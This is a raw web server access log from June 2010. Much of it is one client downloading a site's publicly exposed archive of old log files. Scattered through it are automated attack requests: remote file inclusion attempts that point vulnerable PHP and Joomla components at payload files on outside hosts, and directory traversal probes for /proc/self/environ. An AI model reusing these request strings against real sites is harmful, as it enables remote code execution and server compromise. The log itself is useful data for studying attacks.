178.63.49.142 - - [21/Jun/2010:02:21:10 -0400] "GET /logs/access_log.Q109082800 HTTP/1.1" 200 4649792 "http://www.aceonlinestore.com/logs/access_log.Q109082800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:21:10 -0400] "GET /logs/access_log.Q109082600 HTTP/1.1" 200 5029665 "http://www.aceonlinestore.com/logs/access_log.Q109082600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:21:10 -0400] "GET /logs/access_log.Q109090100 HTTP/1.1" 200 5423123 "http://www.aceonlinestore.com/logs/access_log.Q109090100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:21:10 -0400] "GET /logs/access_log.Q109082700 HTTP/1.1" 200 4307776 "http://www.aceonlinestore.com/logs/access_log.Q109082700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:21:10 -0400] "GET /logs/access_log.Q109083100 HTTP/1.1" 200 4870488 "http://www.aceonlinestore.com/logs/access_log.Q109083100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:21:10 -0400] "GET /logs/access_log.Q109082900 HTTP/1.1" 200 2500375 "http://www.aceonlinestore.com/logs/access_log.Q109082900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:21:10 -0400] "GET /logs/access_log.Q109083000 HTTP/1.1" 200 2261619 "http://www.aceonlinestore.com/logs/access_log.Q109083000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:21:10 -0400] "GET /logs/access_log.Q109090200 HTTP/1.1" 200 4613673 "http://www.aceonlinestore.com/logs/access_log.Q109090200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
62.43.194.164 - - [21/Jun/2010:02:22:21 -0400] "GET /logs/access_log.Q110042400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:02:22:21 -0400] "GET /logs/error_log.Q110060500//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
178.63.49.142 - - [21/Jun/2010:02:22:11 -0400] "GET /logs/access_log.Q109091300 HTTP/1.1" 200 2663486 "http://www.aceonlinestore.com/logs/access_log.Q109091300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:22:11 -0400] "GET /logs/access_log.Q109090900 HTTP/1.1" 200 4982574 "http://www.aceonlinestore.com/logs/access_log.Q109090900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:22:11 -0400] "GET /logs/access_log.Q109091400 HTTP/1.1" 200 5910903 "http://www.aceonlinestore.com/logs/access_log.Q109091400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:22:11 -0400] "GET /logs/access_log.Q109090600 HTTP/1.1" 200 2504510 "http://www.aceonlinestore.com/logs/access_log.Q109090600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:22:11 -0400] "GET /logs/access_log.Q109090500 HTTP/1.1" 200 2649332 "http://www.aceonlinestore.com/logs/access_log.Q109090500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:22:11 -0400] "GET /logs/access_log.Q109091200 HTTP/1.1" 200 2862401 "http://www.aceonlinestore.com/logs/access_log.Q109091200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:22:11 -0400] "GET /logs/access_log.Q109090700 HTTP/1.1" 200 2369217 "http://www.aceonlinestore.com/logs/access_log.Q109090700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:22:11 -0400] "GET /logs/access_log.Q109091000 HTTP/1.1" 200 4894643 "http://www.aceonlinestore.com/logs/access_log.Q109091000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:22:11 -0400] "GET /logs/access_log.Q109090800 HTTP/1.1" 200 5714765 "http://www.aceonlinestore.com/logs/access_log.Q109090800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:22:11 -0400] "GET /logs/access_log.Q109091100 HTTP/1.1" 200 4800132 "http://www.aceonlinestore.com/logs/access_log.Q109091100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
219.255.132.83 - - [21/Jun/2010:02:23:41 -0400] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:23:41 -0400] "GET /logs/access_log.Q109081600/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:23:41 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
174.121.176.46 - - [21/Jun/2010:02:23:44 -0400] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
174.121.176.46 - - [21/Jun/2010:02:23:45 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
74.124.198.61 - - [21/Jun/2010:02:23:48 -0400] "GET /logs/access_log.Q110011600%20%20//spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.218.116.169 - - [21/Jun/2010:02:22:11 -0400] "GET /logs/access_log.Q109092600 HTTP/1.1" 200 2627660 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
203.120.246.20 - - [21/Jun/2010:02:23:51 -0400] "GET /logs/access_log.Q110022700/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
203.120.246.20 - - [21/Jun/2010:02:23:52 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
203.120.246.20 - - [21/Jun/2010:02:23:52 -0400] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
64.8.98.179 - - [21/Jun/2010:02:23:54 -0400] "GET /logs/access_log.Q110011600%20%20//spaw/spaw_control.class.php?spaw_root=http://flowcartagena.net/baner.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
178.63.49.142 - - [21/Jun/2010:02:23:11 -0400] "GET /logs/access_log.Q109091800 HTTP/1.1" 200 4296895 "http://www.aceonlinestore.com/logs/access_log.Q109091800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:23:11 -0400] "GET /logs/access_log.Q109091500 HTTP/1.1" 200 4009718 "http://www.aceonlinestore.com/logs/access_log.Q109091500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:23:11 -0400] "GET /logs/access_log.Q109091700 HTTP/1.1" 200 6031717 "http://www.aceonlinestore.com/logs/access_log.Q109091700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:23:11 -0400] "GET /logs/access_log.Q109092300 HTTP/1.1" 200 4785535 "http://www.aceonlinestore.com/logs/access_log.Q109092300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:23:11 -0400] "GET /logs/access_log.Q109092200 HTTP/1.1" 200 4617999 "http://www.aceonlinestore.com/logs/access_log.Q109092200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:23:11 -0400] "GET /logs/access_log.Q109092000 HTTP/1.1" 200 2173792 "http://www.aceonlinestore.com/logs/access_log.Q109092000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:23:11 -0400] "GET /logs/access_log.Q109091900 HTTP/1.1" 200 2173992 "http://www.aceonlinestore.com/logs/access_log.Q109091900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:23:11 -0400] "GET /logs/access_log.Q109092100 HTTP/1.1" 200 5859236 "http://www.aceonlinestore.com/logs/access_log.Q109092100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:23:11 -0400] "GET /logs/access_log.Q109092400 HTTP/1.1" 200 7812198 "http://www.aceonlinestore.com/logs/access_log.Q109092400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
203.211.129.97 - - [21/Jun/2010:02:24:12 -0400] "GET /logs/access_log.Q110060600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
178.63.49.142 - - [21/Jun/2010:02:23:11 -0400] "GET /logs/access_log.Q109091600 HTTP/1.1" 200 5618969 "http://www.aceonlinestore.com/logs/access_log.Q109091600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
62.43.194.164 - - [21/Jun/2010:02:24:23 -0400] "GET /logs/error_log.Q109051500//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:02:24:23 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:02:24:23 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.208.42 - - [21/Jun/2010:02:24:34 -0400] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
178.63.49.142 - - [21/Jun/2010:02:24:11 -0400] "GET /logs/access_log.Q109100200 HTTP/1.1" 200 4328684 "http://www.aceonlinestore.com/logs/access_log.Q109100200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:24:11 -0400] "GET /logs/access_log.Q109100300 HTTP/1.1" 200 2716025 "http://www.aceonlinestore.com/logs/access_log.Q109100300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
203.120.246.20 - - [21/Jun/2010:02:25:12 -0400] "GET /logs/access_log.Q110061000/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
178.63.49.142 - - [21/Jun/2010:02:24:11 -0400] "GET /logs/access_log.Q109092800 HTTP/1.1" 200 5369029 "http://www.aceonlinestore.com/logs/access_log.Q109092800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:24:11 -0400] "GET /logs/access_log.Q109092700 HTTP/1.1" 200 2319914 "http://www.aceonlinestore.com/logs/access_log.Q109092700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:24:11 -0400] "GET /logs/access_log.Q109092500 HTTP/1.1" 200 4210520 "http://www.aceonlinestore.com/logs/access_log.Q109092500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:24:11 -0400] "GET /logs/access_log.Q109100400 HTTP/1.1" 200 2972627 "http://www.aceonlinestore.com/logs/access_log.Q109100400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:24:11 -0400] "GET /logs/access_log.Q109092600 HTTP/1.1" 200 2627660 "http://www.aceonlinestore.com/logs/access_log.Q109092600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:24:11 -0400] "GET /logs/access_log.Q109092900 HTTP/1.1" 200 5348842 "http://www.aceonlinestore.com/logs/access_log.Q109092900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:24:11 -0400] "GET /logs/access_log.Q109093000 HTTP/1.1" 200 6277446 "http://www.aceonlinestore.com/logs/access_log.Q109093000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:24:11 -0400] "GET /logs/access_log.Q109100100 HTTP/1.1" 200 5059303 "http://www.aceonlinestore.com/logs/access_log.Q109100100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
123.125.66.87 - - [21/Jun/2010:02:25:34 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
163.20.26.5 - - [21/Jun/2010:02:25:35 -0400] "GET /logs/error_log.Q110050400//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
163.20.26.5 - - [21/Jun/2010:02:25:39 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
163.20.26.5 - - [21/Jun/2010:02:25:40 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
220.181.7.96 - - [21/Jun/2010:02:26:05 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
163.20.26.5 - - [21/Jun/2010:02:26:08 -0400] "GET /logs/error_log.Q110050400//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
163.20.26.5 - - [21/Jun/2010:02:26:09 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
178.63.49.142 - - [21/Jun/2010:02:25:11 -0400] "GET /logs/access_log.Q109100600 HTTP/1.1" 200 6447504 "http://www.aceonlinestore.com/logs/access_log.Q109100600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:25:11 -0400] "GET /logs/access_log.Q109101300 HTTP/1.1" 200 6616606 "http://www.aceonlinestore.com/logs/access_log.Q109101300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:25:11 -0400] "GET /logs/access_log.Q109100900 HTTP/1.1" 200 4362897 "http://www.aceonlinestore.com/logs/access_log.Q109100900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:25:11 -0400] "GET /logs/access_log.Q109100800 HTTP/1.1" 200 5508603 "http://www.aceonlinestore.com/logs/access_log.Q109100800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:25:11 -0400] "GET /logs/access_log.Q109100700 HTTP/1.1" 200 5270526 "http://www.aceonlinestore.com/logs/access_log.Q109100700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:25:11 -0400] "GET /logs/access_log.Q109101100 HTTP/1.1" 200 3062842 "http://www.aceonlinestore.com/logs/access_log.Q109101100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:25:11 -0400] "GET /logs/access_log.Q109101200 HTTP/1.1" 200 5438418 "http://www.aceonlinestore.com/logs/access_log.Q109101200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:25:11 -0400] "GET /logs/access_log.Q109101000 HTTP/1.1" 200 2561417 "http://www.aceonlinestore.com/logs/access_log.Q109101000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:25:11 -0400] "GET /logs/access_log.Q109101400 HTTP/1.1" 200 4775365 "http://www.aceonlinestore.com/logs/access_log.Q109101400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:25:11 -0400] "GET /logs/access_log.Q109100500 HTTP/1.1" 200 5396712 "http://www.aceonlinestore.com/logs/access_log.Q109100500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
163.20.26.5 - - [21/Jun/2010:02:26:18 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
95.108.245.251 - - [21/Jun/2010:02:20:11 -0400] "GET /logs/access_log.Q109092800 HTTP/1.1" 200 5369029 "-" "Yandex/1.01.001 (compatible; Win16; I)"
62.43.194.164 - - [21/Jun/2010:02:26:38 -0400] "GET /logs/access_log.Q109061400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.195.114.223 - - [21/Jun/2010:02:21:21 -0400] "GET /logs/error_log.Q110011100 HTTP/1.0" 200 4550565 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
178.63.49.142 - - [21/Jun/2010:02:26:12 -0400] "GET /logs/access_log.Q109101600 HTTP/1.1" 200 3965580 "http://www.aceonlinestore.com/logs/access_log.Q109101600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:26:12 -0400] "GET /logs/access_log.Q109101500 HTTP/1.1" 200 4475657 "http://www.aceonlinestore.com/logs/access_log.Q109101500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:26:12 -0400] "GET /logs/access_log.Q109102100 HTTP/1.1" 200 4525561 "http://www.aceonlinestore.com/logs/access_log.Q109102100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:26:12 -0400] "GET /logs/access_log.Q109102200 HTTP/1.1" 200 5276074 "http://www.aceonlinestore.com/logs/access_log.Q109102200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:26:12 -0400] "GET /logs/access_log.Q109101900 HTTP/1.1" 200 4592495 "http://www.aceonlinestore.com/logs/access_log.Q109101900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:26:12 -0400] "GET /logs/access_log.Q109101700 HTTP/1.1" 200 3075700 "http://www.aceonlinestore.com/logs/access_log.Q109101700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:26:12 -0400] "GET /logs/access_log.Q109102000 HTTP/1.1" 200 6621560 "http://www.aceonlinestore.com/logs/access_log.Q109102000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:26:12 -0400] "GET /logs/access_log.Q109102400 HTTP/1.1" 200 3521379 "http://www.aceonlinestore.com/logs/access_log.Q109102400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:26:12 -0400] "GET /logs/access_log.Q109102300 HTTP/1.1" 200 4345762 "http://www.aceonlinestore.com/logs/access_log.Q109102300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:26:12 -0400] "GET /logs/access_log.Q109101800 HTTP/1.1" 200 3541165 "http://www.aceonlinestore.com/logs/access_log.Q109101800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
219.255.132.83 - - [21/Jun/2010:02:27:14 -0400] "GET /logs//errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:27:14 -0400] "GET //errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:27:14 -0400] "GET /logs/access_log.Q109052200//errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:27:17 -0400] "GET /logs/access_log.Q109052200//errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:27:17 -0400] "GET //errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:27:17 -0400] "GET /logs//errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:27:21 -0400] "GET /logs/access_log.Q109053100//errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:27:24 -0400] "GET /logs/access_log.Q109053100//errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:27:43 -0400] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:27:43 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
219.255.132.83 - - [21/Jun/2010:02:27:44 -0400] "GET /logs/access_log.Q109081600/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
64.237.56.50 - - [21/Jun/2010:02:28:10 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mservice.com.vn/htmls/images/myid.jpg? HTTP/1.1" 404 261 "-" "libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:02:28:10 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mservice.com.vn/htmls/images/myid.jpg? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
64.237.56.50 - - [21/Jun/2010:02:28:10 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mservice.com.vn/htmls/images/myid.jpg? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
178.63.49.142 - - [21/Jun/2010:02:27:12 -0400] "GET /logs/access_log.Q109103100 HTTP/1.1" 200 3223078 "http://www.aceonlinestore.com/logs/access_log.Q109103100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:27:12 -0400] "GET /logs/access_log.Q109102600 HTTP/1.1" 200 7284585 "http://www.aceonlinestore.com/logs/access_log.Q109102600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:27:12 -0400] "GET /logs/access_log.Q109110300 HTTP/1.1" 200 6323898 "http://www.aceonlinestore.com/logs/access_log.Q109110300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:27:12 -0400] "GET /logs/access_log.Q109102700 HTTP/1.1" 200 6408495 "http://www.aceonlinestore.com/logs/access_log.Q109102700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:27:12 -0400] "GET /logs/access_log.Q109102500 HTTP/1.1" 200 3025880 "http://www.aceonlinestore.com/logs/access_log.Q109102500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:27:12 -0400] "GET /logs/access_log.Q109102800 HTTP/1.1" 200 5889992 "http://www.aceonlinestore.com/logs/access_log.Q109102800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:27:12 -0400] "GET /logs/access_log.Q109110100 HTTP/1.1" 200 3178005 "http://www.aceonlinestore.com/logs/access_log.Q109110100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
178.63.49.142 - - [21/Jun/2010:02:27:12 -0400] "GET /logs/access_log.Q109110200 HTTP/1.1" 200 5338894 "http://www.aceonlinestore.com/logs/access_log.Q109110200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4320)"
62.43.194.164 - - [21/Jun/2010:02:28:13 -0400] "GET //admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:02:28:14 -0400] "GET /logs/access_log.Q110010300%20%20//admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:02:28:14 -0400] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
